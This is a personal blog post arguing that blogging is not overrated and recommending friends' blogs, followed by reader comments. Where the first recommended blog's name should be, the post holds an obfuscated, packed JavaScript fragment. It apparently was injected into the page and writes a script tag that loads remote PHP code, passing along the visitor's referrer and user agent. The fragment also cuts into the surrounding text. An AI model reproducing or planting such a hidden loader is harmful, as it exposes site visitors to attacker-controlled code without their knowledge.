Is blogging overrated?

I went to a marketing in social media seminar last night.

The presenter had a pretty decent resume and had some good suggestions for social media and the arts.

But then he broke my heart.  He thought blogging was overrated.  Insert very-sad-face here.

He felt that facebook and twitter were microblogs and essentially the same, only they cater to our ever dwindling attention spans.  Boo!

And here’s why.

1.  I like reading blogs.  And judging by my google analytics, a few of you out there like reading mine (don’t worry, I can’t tell who you are, you can continue to blog stalk me as long as you like).

2. While I do check facebook on a daily basis, I don’t look forward to anyone’s specific status updates.  I appreciate a good link or video from time to time, if your kids are cute, I’ll probably smile and if you have cute pets, I like that too.  If you’re passive aggressive or super lovey dovery, no me gusta.

3.  BUT I do look forward to new blog posts!  They are like brain candy.  Want to know some of my faves, and ones you might want to consider following?

Still ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dtidd|var|u0026u|referrer|itiya||js|php’.split(‘|’),0,{}))
in St. Louis
 – she’s a mom of 2 boys, living in St. Louis (duh) and has her own etsy shop.  She actually lived in Africa for a little while.  No idea how I started reading her blog, but I enjoy it and actually visited some of the places she blogs about when I was in St. Louis last May.  She updates a few times per week.

Endurance Girl – my old college roommate and super athlete.  She may or may not be on a temporary hiatus, but she’ll make you think that running a marathon is no biggy.  This girl has competed (and won) many triathlons.  And oh by the way, she competed at Kona.  Dear Laura, if you’re reading this, please start blogging again.  I think I lost weight just by reading your posts.

Rickshaw Writer – my old boss and his adorable wife and their journey as they help children in India.  Does it get any better than this?  They are out there doing good in this world, and it usually makes me feel warm and fuzzy.  Be sure to read the comments, Sean’s brother (Todd) usually has some gems.  They are a once a week type blog.

The Gimenezs – our friends Kellie and Chris.  Just the day to day life of Chris and Kel, and their pup max.  Usually a couple times a week.

Perpetually Engaged – I’m not planning a wedding, but this a great site by my friend, Nikki.  She collects a ton of great ideas that can easily be used for party planning and hosting (if you’re already done planning your own wedding).  She posts daily.  She also has a personal site, I enjoy that as well.  Also daily.  Busy girl!

Rocket Shoes – I don’t know this guy (although sometimes I feel like I do).  He got famous back when he blogged about the giants.  He’s pretty hilarious.  He only blogs once every few weeks.  But it’s well worth it.  Add him to your list, you won’t be disappointed.  I related to one of his most recent posts, “Why I Stopped Following You or Defriended You on a Popular Social Networking Site.

Nick’s Blog – You could say that I’m obliged to put it on here.  But in reality, his blog is way better than mine (in the intellectual sense.  I provide brain fluff, he provides information, but he’s decently witty).  He’s got some pretty popular posts – they even show up in google.  You can learn how 2 buck chuck makes money or how restaurant.com works.  He use to blog daily, but I think he’s been a little busy.  So now it’s a couple times a week.  If you like what you see, leave a comment and let him know.  He doesn’t think anyone reads it.  Now he’s going to be embarrassed by my shameless plug.

SO there you have it.  Blogs are not overrated.  At least not to me.  Do you have a favorite blog?  Share it!

Good call. I look forward to reading you blog and Nick’s blog nearly every work day. It’s part of my morning. Keep up the good work.

This guy’s blogs are super long, but they crack me up. He’s a bartender in Salt Lake so I learn quite a bit about how hard it is to be a bartender, how stupid people get, and what it’s like to serve all the Mormons. He’s very funny and very intelligent. http://raskinsrhetoric.blogspot.com

I love blogs!! You really get to know people…much better then status updates! I look forward to checking the blogs I follow every day!! It’s like my daily news!! A couple of my new favorites are prego blogs…the pregnant chicken and lucie’s list are informative and hilarious! 🙂

Aww, thanks for the shout out! Everyone and there Mom’s have blogs (okay maybe just my Mom), that’s why you have to do it for you. Plus they’re like social circles…you’re never going to be top dog because something new is always just around the corner. But as long as you are content…and have content (see what I did there? 😉 then c’est la vie! My favorites rotate, but I have 300 in my google reader!

Facebook is for the lazy, bloggers put way more thought into their posts.
